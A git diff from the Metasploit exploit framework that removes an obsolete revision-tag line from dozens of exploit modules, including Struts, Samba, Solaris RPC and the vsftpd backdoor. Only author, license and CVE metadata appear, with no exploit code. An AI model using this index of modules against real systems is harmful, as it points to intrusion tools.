a/modules/exploits/multi/http/spree_searchlogic_exec.rb b/modules/exploits/multi/http/spree_searchlogic_exec.rb index 05c2b782d6..3bf8adb859 100644 --- a/modules/exploits/multi/http/spree_searchlogic_exec.rb +++ b/modules/exploits/multi/http/spree_searchlogic_exec.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'joernchen ' ], #Phenoelit 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '71900'], diff --git a/modules/exploits/multi/http/struts_code_exec.rb b/modules/exploits/multi/http/struts_code_exec.rb index fd023e190d..982b3c100d 100644 --- a/modules/exploits/multi/http/struts_code_exec.rb +++ b/modules/exploits/multi/http/struts_code_exec.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Meder Kydyraliev', # original public exploit ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-1870'], diff --git a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb index 277b65efa4..caa7d8b2da 100644 --- a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb +++ b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb @@ -33,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote 'mihi' # ARCH_JAVA support ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2012-0391'], diff --git a/modules/exploits/multi/http/sun_jsws_dav_options.rb b/modules/exploits/multi/http/sun_jsws_dav_options.rb index f8a035e9ac..7676d62c8b 100644 --- a/modules/exploits/multi/http/sun_jsws_dav_options.rb +++ b/modules/exploits/multi/http/sun_jsws_dav_options.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote Intevydis. }, 'Author' => 'jduck', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0361' ], diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb index 8703918f99..831e31a30d 100644 --- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb +++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ # There is no single vulnerability associated with deployment functionality. diff --git a/modules/exploits/multi/misc/java_rmi_server.rb b/modules/exploits/multi/misc/java_rmi_server.rb index ab84c42a19..2c13434db8 100644 --- a/modules/exploits/multi/misc/java_rmi_server.rb +++ b/modules/exploits/multi/misc/java_rmi_server.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'mihi' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ # RMI protocol specification diff --git a/modules/exploits/multi/misc/openview_omniback_exec.rb b/modules/exploits/multi/misc/openview_omniback_exec.rb index 3eb1090a41..618d3ecf54 100644 --- a/modules/exploits/multi/misc/openview_omniback_exec.rb +++ b/modules/exploits/multi/misc/openview_omniback_exec.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm', 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2001-0311'], diff --git a/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb b/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb index 660d586be4..dfd9b3dd1f 100644 --- a/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb +++ b/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-1389' ], diff --git a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb index 7756e2cb9d..2c9a14a689 100644 --- a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb +++ b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb @@ -42,7 +42,6 @@ class Metasploit3 < Msf::Exploit::Remote 'redsand' # windows target/testing ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0304' ], diff --git a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb index 8ee896f9ad..a02d71e633 100644 --- a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb +++ b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb @@ -43,7 +43,6 @@ class Metasploit3 < Msf::Exploit::Remote 'redsand' # windows target/testing ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0304' ], diff --git a/modules/exploits/multi/misc/zend_java_bridge.rb b/modules/exploits/multi/misc/zend_java_bridge.rb index c6353de1a0..0bd37ab9c7 100644 --- a/modules/exploits/multi/misc/zend_java_bridge.rb +++ b/modules/exploits/multi/misc/zend_java_bridge.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'bannedit' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '71420'], diff --git a/modules/exploits/multi/ntp/ntp_overflow.rb b/modules/exploits/multi/ntp/ntp_overflow.rb index e2e96cb69d..168cb57a67 100644 --- a/modules/exploits/multi/ntp/ntp_overflow.rb +++ b/modules/exploits/multi/ntp/ntp_overflow.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'patrick', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2001-0414' ], diff --git a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb index fc47f14eba..768ebea6bc 100644 --- a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb +++ b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb @@ -40,7 +40,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Stefan Esser ' # discovered, patched, exploited ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-1286'], diff --git a/modules/exploits/multi/realserver/describe.rb b/modules/exploits/multi/realserver/describe.rb index 2ee5511237..431750599e 100644 --- a/modules/exploits/multi/realserver/describe.rb +++ b/modules/exploits/multi/realserver/describe.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote servers. }, 'Author' => 'hdm', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2002-1643' ], diff --git a/modules/exploits/multi/samba/nttrans.rb b/modules/exploits/multi/samba/nttrans.rb index d2ee30053a..da00c38fc2 100644 --- a/modules/exploits/multi/samba/nttrans.rb +++ b/modules/exploits/multi/samba/nttrans.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2002-1318' ], diff --git a/modules/exploits/multi/samba/usermap_script.rb b/modules/exploits/multi/samba/usermap_script.rb index e5bdb4f8ce..e67a4d5106 100644 --- a/modules/exploits/multi/samba/usermap_script.rb +++ b/modules/exploits/multi/samba/usermap_script.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-2447' ], diff --git a/modules/exploits/multi/svn/svnserve_date.rb b/modules/exploits/multi/svn/svnserve_date.rb index 1829dd158e..38566abeda 100644 --- a/modules/exploits/multi/svn/svnserve_date.rb +++ b/modules/exploits/multi/svn/svnserve_date.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote it during testing) corrupt the subversion database, so be careful! }, 'Author' => 'spoonm', - 'Version' => '$Revision$', 'References' => [ ['CVE', '2004-0397'], diff --git a/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb b/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb index 2006cb0998..211e9dd7c7 100644 --- a/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb +++ b/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Stance' => Msf::Exploit::Stance::Aggressive, 'Author' => 'kf', - 'Version' => '$Revision$', 'References' => [ ['CVE', '2009-0695'], diff --git a/modules/exploits/netware/smb/lsass_cifs.rb b/modules/exploits/netware/smb/lsass_cifs.rb index 5d51d6e23a..4928d83b9e 100644 --- a/modules/exploits/netware/smb/lsass_cifs.rb +++ b/modules/exploits/netware/smb/lsass_cifs.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote 'toto', ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-2852' ], diff --git a/modules/exploits/netware/sunrpc/pkernel_callit.rb b/modules/exploits/netware/sunrpc/pkernel_callit.rb index 9753a457d6..daa9b07ff5 100644 --- a/modules/exploits/netware/sunrpc/pkernel_callit.rb +++ b/modules/exploits/netware/sunrpc/pkernel_callit.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'pahtzo', ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ # There is no CVE for this vulnerability diff --git a/modules/exploits/osx/afp/loginext.rb b/modules/exploits/osx/afp/loginext.rb index 869cd45b20..101e29146b 100644 --- a/modules/exploits/osx/afp/loginext.rb +++ b/modules/exploits/osx/afp/loginext.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'hdm', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-0430'], diff --git a/modules/exploits/osx/arkeia/type77.rb b/modules/exploits/osx/arkeia/type77.rb index 8e3a7d83fd..22ecd2fd91 100644 --- a/modules/exploits/osx/arkeia/type77.rb +++ b/modules/exploits/osx/arkeia/type77.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-0491'], diff --git a/modules/exploits/osx/browser/safari_file_policy.rb b/modules/exploits/osx/browser/safari_file_policy.rb index 42fd0bd076..f4e149e274 100644 --- a/modules/exploits/osx/browser/safari_file_policy.rb +++ b/modules/exploits/osx/browser/safari_file_policy.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote Xcode instead of executing it, in that case please try the Java ones instead. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'Aaron Sigel', # Initial discovery diff --git a/modules/exploits/osx/browser/safari_metadata_archive.rb b/modules/exploits/osx/browser/safari_metadata_archive.rb index 1475ef3e26..2d3c818f3c 100644 --- a/modules/exploits/osx/browser/safari_metadata_archive.rb +++ b/modules/exploits/osx/browser/safari_metadata_archive.rb @@ -37,7 +37,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'hdm' ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-0848'], diff --git a/modules/exploits/osx/browser/software_update.rb b/modules/exploits/osx/browser/software_update.rb index 2f2ffacefe..3809c46e23 100644 --- a/modules/exploits/osx/browser/software_update.rb +++ b/modules/exploits/osx/browser/software_update.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Moritz Jodeit ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-5863'], diff --git a/modules/exploits/osx/email/mailapp_image_exec.rb b/modules/exploits/osx/email/mailapp_image_exec.rb index d98f8fa656..08cb63b138 100644 --- a/modules/exploits/osx/email/mailapp_image_exec.rb +++ b/modules/exploits/osx/email/mailapp_image_exec.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => ['hdm', 'kf'], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-0395'], diff --git a/modules/exploits/osx/ftp/webstar_ftp_user.rb b/modules/exploits/osx/ftp/webstar_ftp_user.rb index a779dc8362..41b8219d03 100644 --- a/modules/exploits/osx/ftp/webstar_ftp_user.rb +++ b/modules/exploits/osx/ftp/webstar_ftp_user.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'ddz', 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-0695'], diff --git a/modules/exploits/osx/http/evocam_webserver.rb b/modules/exploits/osx/http/evocam_webserver.rb index d60ba7bc04..34cf536237 100644 --- a/modules/exploits/osx/http/evocam_webserver.rb +++ b/modules/exploits/osx/http/evocam_webserver.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Paul Harrington', # Original Exploit Author and MSF Module 'dookie', # MSF Module Assistance ], - 'Version' => '$Revision$', 'Platform' => 'osx', 'License' => MSF_LICENSE, 'References' => diff --git a/modules/exploits/osx/mdns/upnp_location.rb b/modules/exploits/osx/mdns/upnp_location.rb index dfccfc7b53..7389b892dd 100644 --- a/modules/exploits/osx/mdns/upnp_location.rb +++ b/modules/exploits/osx/mdns/upnp_location.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'ddz' ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '35142' ], diff --git a/modules/exploits/osx/misc/ufo_ai.rb b/modules/exploits/osx/misc/ufo_ai.rb index 0fb5415a19..56f998fad0 100644 --- a/modules/exploits/osx/misc/ufo_ai.rb +++ b/modules/exploits/osx/misc/ufo_ai.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote 'dookie' # OSX Exploit Author ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '65689' ], diff --git a/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb b/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb index 7945ab9da9..b1851c4b25 100644 --- a/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb +++ b/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'MacOS X QuickTime RTSP Content-Type Overflow', # Description? 'Author' => 'unknown', - 'Version' => '$Revision$', 'Platform' => 'osx', 'References' => [ diff --git a/modules/exploits/osx/samba/lsa_transnames_heap.rb b/modules/exploits/osx/samba/lsa_transnames_heap.rb index bb20ac9426..10b4a4812d 100644 --- a/modules/exploits/osx/samba/lsa_transnames_heap.rb +++ b/modules/exploits/osx/samba/lsa_transnames_heap.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-2446'], diff --git a/modules/exploits/osx/samba/trans2open.rb b/modules/exploits/osx/samba/trans2open.rb index fc8adba31a..fbee422769 100644 --- a/modules/exploits/osx/samba/trans2open.rb +++ b/modules/exploits/osx/samba/trans2open.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote exploiting the bug on Mac OS X PowerPC systems. }, 'Author' => [ 'hdm', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0201' ], diff --git a/modules/exploits/solaris/dtspcd/heap_noir.rb b/modules/exploits/solaris/dtspcd/heap_noir.rb index 9a959cc17f..f9e7e8c552 100644 --- a/modules/exploits/solaris/dtspcd/heap_noir.rb +++ b/modules/exploits/solaris/dtspcd/heap_noir.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'noir ', 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2001-0803'], diff --git a/modules/exploits/solaris/lpd/sendmail_exec.rb b/modules/exploits/solaris/lpd/sendmail_exec.rb index e2b425e09f..05a5daf3bc 100644 --- a/modules/exploits/solaris/lpd/sendmail_exec.rb +++ b/modules/exploits/solaris/lpd/sendmail_exec.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm', 'ddz' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2001-1583'], diff --git a/modules/exploits/solaris/samba/lsa_transnames_heap.rb b/modules/exploits/solaris/samba/lsa_transnames_heap.rb index 9357a9f24a..09bf4efacb 100644 --- a/modules/exploits/solaris/samba/lsa_transnames_heap.rb +++ b/modules/exploits/solaris/samba/lsa_transnames_heap.rb @@ -33,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-2446'], diff --git a/modules/exploits/solaris/samba/trans2open.rb b/modules/exploits/solaris/samba/trans2open.rb index ed54fa6bf4..2ef9fa64ba 100644 --- a/modules/exploits/solaris/samba/trans2open.rb +++ b/modules/exploits/solaris/samba/trans2open.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm', 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0201' ], diff --git a/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb b/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb index 9d61925df7..5be0f26242 100644 --- a/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb +++ b/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb @@ -37,7 +37,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Ramon de C Valle', 'Adriano Lima ', ], - 'Version' => '$Revision$', 'Arch' => ARCH_X86, 'Platform' => 'solaris', 'References' => diff --git a/modules/exploits/solaris/sunrpc/sadmind_exec.rb b/modules/exploits/solaris/sunrpc/sadmind_exec.rb index c281359ea2..9a2d955794 100644 --- a/modules/exploits/solaris/sunrpc/sadmind_exec.rb +++ b/modules/exploits/solaris/sunrpc/sadmind_exec.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'vlad902 ', 'hdm', 'cazz' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2003-0722'], diff --git a/modules/exploits/solaris/sunrpc/ypupdated_exec.rb b/modules/exploits/solaris/sunrpc/ypupdated_exec.rb index 94e99be499..393fc48b41 100644 --- a/modules/exploits/solaris/sunrpc/ypupdated_exec.rb +++ b/modules/exploits/solaris/sunrpc/ypupdated_exec.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'I)ruid ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '1999-0209'], diff --git a/modules/exploits/solaris/telnet/fuser.rb b/modules/exploits/solaris/telnet/fuser.rb index cfceb47eea..3edeabe0ac 100644 --- a/modules/exploits/solaris/telnet/fuser.rb +++ b/modules/exploits/solaris/telnet/fuser.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-0882' ], diff --git a/modules/exploits/solaris/telnet/ttyprompt.rb b/modules/exploits/solaris/telnet/ttyprompt.rb index 0ab86110de..4593f7a168 100644 --- a/modules/exploits/solaris/telnet/ttyprompt.rb +++ b/modules/exploits/solaris/telnet/ttyprompt.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC', 'cazz' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2001-0797'], diff --git a/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb b/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb index e34fc33b86..3771bfa58b 100644 --- a/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb +++ b/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC', 'darkharper2' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '69562'], diff --git a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb index b2e9e896a5..790c55dcf8 100644 --- a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb +++ b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm', 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '73573'], diff --git a/modules/exploits/unix/http/contentkeeperweb_mimencode.rb b/modules/exploits/unix/http/contentkeeperweb_mimencode.rb index 91d447121e..bd6c32ac91 100644 --- a/modules/exploits/unix/http/contentkeeperweb_mimencode.rb +++ b/modules/exploits/unix/http/contentkeeperweb_mimencode.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'patrick' ], 'Arch' => [ ARCH_CMD ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '54551' ], diff --git a/modules/exploits/unix/http/lifesize_room.rb b/modules/exploits/unix/http/lifesize_room.rb index 17317cbd1b..0b889c22c1 100644 --- a/modules/exploits/unix/http/lifesize_room.rb +++ b/modules/exploits/unix/http/lifesize_room.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Spencer McIntyre', ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-2763' ], diff --git a/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb b/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb index 0632f252cd..4235a82847 100644 --- a/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb +++ b/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-2075' ], diff --git a/modules/exploits/unix/misc/distcc_exec.rb b/modules/exploits/unix/misc/distcc_exec.rb index d32bccc6fa..b7dd86d672 100644 --- a/modules/exploits/unix/misc/distcc_exec.rb +++ b/modules/exploits/unix/misc/distcc_exec.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-2687'], diff --git a/modules/exploits/unix/misc/spamassassin_exec.rb b/modules/exploits/unix/misc/spamassassin_exec.rb index a8dc8776f4..653c870f19 100644 --- a/modules/exploits/unix/misc/spamassassin_exec.rb +++ b/modules/exploits/unix/misc/spamassassin_exec.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-2447' ], diff --git a/modules/exploits/unix/misc/zabbix_agent_exec.rb b/modules/exploits/unix/misc/zabbix_agent_exec.rb index 855720d062..8ec179bbbc 100644 --- a/modules/exploits/unix/misc/zabbix_agent_exec.rb +++ b/modules/exploits/unix/misc/zabbix_agent_exec.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-4502' ], diff --git a/modules/exploits/unix/smtp/clamav_milter_blackhole.rb b/modules/exploits/unix/smtp/clamav_milter_blackhole.rb index b18a8aac42..e64cd1fd27 100644 --- a/modules/exploits/unix/smtp/clamav_milter_blackhole.rb +++ b/modules/exploits/unix/smtp/clamav_milter_blackhole.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-4560' ], diff --git a/modules/exploits/unix/smtp/exim4_string_format.rb b/modules/exploits/unix/smtp/exim4_string_format.rb index 75bb11af8e..c2f44a16f8 100644 --- a/modules/exploits/unix/smtp/exim4_string_format.rb +++ b/modules/exploits/unix/smtp/exim4_string_format.rb @@ -48,7 +48,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'jduck', 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-4344' ], diff --git a/modules/exploits/unix/webapp/awstats_configdir_exec.rb b/modules/exploits/unix/webapp/awstats_configdir_exec.rb index c9661b76d7..f4c299facb 100644 --- a/modules/exploits/unix/webapp/awstats_configdir_exec.rb +++ b/modules/exploits/unix/webapp/awstats_configdir_exec.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Matteo Cantoni ', 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-0116'], diff --git a/modules/exploits/unix/webapp/awstats_migrate_exec.rb b/modules/exploits/unix/webapp/awstats_migrate_exec.rb index 5905a6be22..41fc73a8ae 100644 --- a/modules/exploits/unix/webapp/awstats_migrate_exec.rb +++ b/modules/exploits/unix/webapp/awstats_migrate_exec.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-2237'], diff --git a/modules/exploits/unix/webapp/awstatstotals_multisort.rb b/modules/exploits/unix/webapp/awstatstotals_multisort.rb index 620ec2cad9..d1f5daa5fb 100644 --- a/modules/exploits/unix/webapp/awstatstotals_multisort.rb +++ b/modules/exploits/unix/webapp/awstatstotals_multisort.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2008-3922'], diff --git a/modules/exploits/unix/webapp/barracuda_img_exec.rb b/modules/exploits/unix/webapp/barracuda_img_exec.rb index 0881273285..71bd64e934 100644 --- a/modules/exploits/unix/webapp/barracuda_img_exec.rb +++ b/modules/exploits/unix/webapp/barracuda_img_exec.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Nicolas Gregoire ', 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-2847'], diff --git a/modules/exploits/unix/webapp/base_qry_common.rb b/modules/exploits/unix/webapp/base_qry_common.rb index 1cb1011181..e4c138d430 100644 --- a/modules/exploits/unix/webapp/base_qry_common.rb +++ b/modules/exploits/unix/webapp/base_qry_common.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-2685' ], diff --git a/modules/exploits/unix/webapp/cacti_graphimage_exec.rb b/modules/exploits/unix/webapp/cacti_graphimage_exec.rb index 7831e6c378..ecabfff37f 100644 --- a/modules/exploits/unix/webapp/cacti_graphimage_exec.rb +++ b/modules/exploits/unix/webapp/cacti_graphimage_exec.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'David Maciejak ', 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '17539' ], diff --git a/modules/exploits/unix/webapp/cakephp_cache_corruption.rb b/modules/exploits/unix/webapp/cakephp_cache_corruption.rb index cb67177938..61acc4dc56 100644 --- a/modules/exploits/unix/webapp/cakephp_cache_corruption.rb +++ b/modules/exploits/unix/webapp/cakephp_cache_corruption.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Felix Wilhelm', # poc ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '69352' ], diff --git a/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb b/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb index dd26ead4cf..c92824d02a 100644 --- a/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb +++ b/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Erwin Paternotte', # Exploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-4566' ], diff --git a/modules/exploits/unix/webapp/coppermine_piceditor.rb b/modules/exploits/unix/webapp/coppermine_piceditor.rb index 85e6be4dbe..da9d4193e2 100644 --- a/modules/exploits/unix/webapp/coppermine_piceditor.rb +++ b/modules/exploits/unix/webapp/coppermine_piceditor.rb @@ -43,7 +43,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' 